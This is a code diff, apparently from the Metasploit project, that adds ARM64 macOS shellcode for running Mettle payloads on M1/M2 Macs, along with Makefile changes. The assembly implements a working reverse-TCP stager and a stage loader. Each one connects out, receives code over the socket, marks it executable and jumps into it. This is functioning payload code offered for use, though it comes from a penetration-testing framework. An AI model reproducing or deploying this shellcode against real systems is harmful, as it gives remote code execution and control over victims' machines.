M1ssion Dyld Mettle: Aarch64 Payloads

This builds on Back from the dyld by adding the required aarch64
assembly code to enable the OSX loader to run on the m1. This enables
the use of native payloads on M1 or M2 devices that do not have Rosetta
installed.

external/source/shellcode/osx/aarch64/stage_mettle.s

@@ -0,0 +1,109 @@
+.equ SYS_RECVFROM, 0x200001d
+.equ SYS_MPROTECT, 0x200004a
+.equ SYS_MMAP, 0x20000c5
+.equ SYS_EXIT, 0x2000001
+
+.global _main
+_main:
+    /* mmap(addr=0, length=stager_size, prot=2, flags=0x1002, fd=0, offset=0) */
+    mov    x0, xzr
+    adr    x1, stager_size
+    ldr    x1, [x1]
+    mov    x2, #2
+    mov    x3, #0x1002
+    mov    x4, xzr
+    mov    x5, xzr
+    ldr    x16, =SYS_MMAP
+    svc    0
+
+    /* sockfd is in x13 */
+    mov x10, x0
+
+    /* recvfrom(sockfd='x13', address='x10', length=stager_size, flags='MSG_WAITALL', from=0, fromlenaddr=0) */
+    mov x0, x13
+    mov x1, x10
+    adr x2, stager_size
+    ldr x2, [x2]
+    mov x3, #0x40
+    mov x4, xzr
+    mov x5, xzr
+    ldr x16, =SYS_RECVFROM
+    svc 0
+
+    /* mprotect(addr='x10',  length=stager_size, prot=0x5) */
+    mov x0, x10
+    adr x1, stager_size
+    ldr x1, [x1]
+    mov x2, #5
+    ldr x16, =SYS_MPROTECT
+    svc 0
+
+    /* mmap(addr=0, length=payload_size, prot=3, flags=0x1002, fd=0, offset=0) */
+    mov x0, xzr
+    adr x1, payload_size
+    ldr x1, [x1]
+    mov x2, #3
+    mov x3, #0x1002
+    mov x4, xzr
+    mov x5, xzr
+    ldr x16, =SYS_MMAP
+    svc 0
+
+    mov x11, x0
+
+    /* recvfrom(sockfd='x13', address='x11', length=payload_size, flags='MSG_WAITALL', from=0, fromlenaddr=0) */
+    mov x0, x13
+    mov x1, x11
+    adr x2, payload_size
+    ldr x2, [x2]
+    mov x3, #0x40
+    mov x4, xzr
+    mov x5, xzr
+    ldr x16, =SYS_RECVFROM
+    svc 0
+
+    /* add entry_offset */
+    adr x0, entry_offset
+    ldr x0, [x0]
+    add x0, x0, x10
+    adr x10, payload_size
+    ldr x10, [x10]
+    mov x12, x11
+    mov x15, x0
+
+    /* make stack space */
+    /* mmap(addr=0, length=0x4000, prot=3, flags=0x1002, fd=0, offset=0) */
+    mov x0, xzr
+    mov x1, 0x4000
+    mov x2, 3
+    mov x3, 0x1002
+    mov x4, xzr
+    mov x5, xzr
+    ldr x16, =SYS_MMAP
+    svc 0
+    //mov x1, sp
+    //bic sp, x1, #15
+    //sub sp, sp, 0x1000
+    add x0, x0, 0x2000
+    mov sp, x0
+
+    mov x0, x13
+
+    /* jump to main_osx */
+    blr x15
+
+failed:
+    mov    x0, 0
+    ldr    x16, =SYS_EXIT
+    svc    0
+
+.balign 16
+stager_size:
+        .word 0x4242
+        .word 0x4343
+payload_size:
+        .word 0x4444
+        .word 0x4545
+entry_offset:
+        .word 0x4646
+        .word 0x4747

external/source/shellcode/osx/aarch64/stager_sock_reverse.s

@@ -0,0 +1,118 @@
+.equ SYS_RECVFROM, 0x200001d
+.equ SYS_MPROTECT, 0x200004a
+.equ SYS_CONNECT, 0x2000062
+.equ SYS_SELECT, 0x200005d
+.equ SYS_SOCKET, 0x2000061
+.equ SYS_MMAP, 0x20000c5
+.equ SYS_EXIT, 0x2000001
+
+.equ AF_INET, 0x2
+.equ SOCK_STREAM, 0x1
+
+.equ STDIN, 0x0
+.equ STDOUT, 0x1
+.equ STDERR, 0x2
+
+.equ IP, 0x0100007f
+.equ PORT, 0x5C11
+
+.global _main
+_main:
+  /* mmap(addr=0, length=0x1000, prot=0x2, flags=0x1002, fd=-1, offset=0) */
+  mov x0, xzr
+  mov x1, #0x1000
+  mov x2, #2
+  mov x3, #0x1002
+  mvn x4, xzr
+  mov x5, xzr
+  ldr x16, =SYS_MMAP
+  svc 0
+  cmn x0, #0x1
+  beq failed
+
+  /* save retry_count */
+  mov x12, x0
+  mov x10, 0
+  adr x11, retry_count
+  ldr x11, [x11]
+
+  /* socket(AF_INET, SOCK_STREAM, IPPROTO_IP) */
+socket:
+  mov x0, AF_INET
+  mov x1, SOCK_STREAM
+  mov x2, 0
+  ldr x16, =SYS_SOCKET
+  svc 0
+  //cbz w0, retry
+
+  mov x13, x0
+
+  /* connect(sockfd, {AF_INET,4444,127.0.0.1}, 16) */
+  adr x1, caddr
+  ldr x1, [x1]
+  str x1, [sp, #-8]!
+  mov x1, sp
+  mov x2, 16
+  ldr x16, =SYS_CONNECT
+  svc 0
+  //cbnz w0, retry
+
+  /* recvfrom(sockfd='x13', address='x11', length=0x1000, flags='MSG_WAITALL', from=0, fromlenaddr=0) */
+  mov x0, x13
+  mov x1, x12
+  mov x2, #328
+  mov x3, #0x40
+  mov x4, xzr
+  mov x5, xzr 
+  ldr x16, =SYS_RECVFROM
+  svc 0
+  //cbnz w0, retry
+
+  /* mprotect(addr, 328, 0x5) */
+  mov x0, x12
+  mov x1, #328
+  mov x2, #5
+  ldr x16, =SYS_MPROTECT
+  svc 0
+
+  br x12
+
+retry:
+  sub x11, x11, #1
+  cmp x11, 0
+  beq failed
+
+  /* select(0, 0, 0, 0, &{sleep_nanoseconds, sleep_seconds}) */
+  mov x0, 0
+  mov x1, 0
+  adr x2, sleep_nanoseconds
+  ldr x2, [x2]
+  adr x3, sleep_seconds
+  ldr x3, [x3]
+  stp x3, x2, [sp, #-16]!
+  mov x4, sp
+  mov x2, 0
+  mov x3, 0
+  ldr x16, =SYS_SELECT
+  svc 0
+  bal socket
+
+failed:
+  mov x0, 0x1
+  ldr x16, =SYS_EXIT
+  svc 0
+
+.balign 16
+caddr:
+  .short AF_INET
+  .short PORT
+  .word IP
+retry_count:
+  .word 0x4242
+  .word 0x4242
+sleep_nanoseconds:
+  .word 0x4343
+  .word 0x4343
+sleep_seconds:
+  .word 0x4444
+  .word 0x4444

external/source/shellcode/osx/stager/Makefile

@@ -1,19 +1,27 @@
 CFLAGS=-fno-stack-protector -fomit-frame-pointer -fno-exceptions -fPIC -Os -O0
 GCC_BIN_OSX=`xcrun --sdk macosx -f gcc`
 GCC_BASE_OSX=$(GCC_BIN_OSX) $(CFLAGS)
-GCC_OSX=$(GCC_BASE_OSX) -arch x86_64
+GCC_OSX_X64=$(GCC_BASE_OSX) -arch x86_64
+GCC_OSX_AARCH64=$(GCC_BASE_OSX) -arch arm64
 
-all: clean main_osx
+all: clean x64_osx_stage aarch64_osx_stage
 
-main_osx: main.c
-	$(GCC_OSX) -o $@ $^
+x64_osx_stage: main.c
+	$(GCC_OSX_X64) -o $@ $^
 
-install: main_osx
-	cp main_osx ../../../../../data/meterpreter/x64_osx_stage
+aarch64_osx_stage: main.c
+	$(GCC_OSX_AARCH64) -o $@ $^
 
-shellcode: install
-	otool -tv main_osx
+install: x64_osx_stage aarch64_osx_stage
+	cp x64_osx_stage ../../../../../data/meterpreter/x64_osx_stage
+	cp aarch64_osx_stage ../../../../../data/meterpreter/aarch64_osx_stage
+
+x64_shellcode: install
+	otool -tv x64_osx_stage
+
+aarch64_shellcode: install
+	otool -tv aarch64_osx_stage
 
 clean:
-	rm -f *.o main_osx
+	rm -f *.o x64_osx_stage aarch64_osx_stage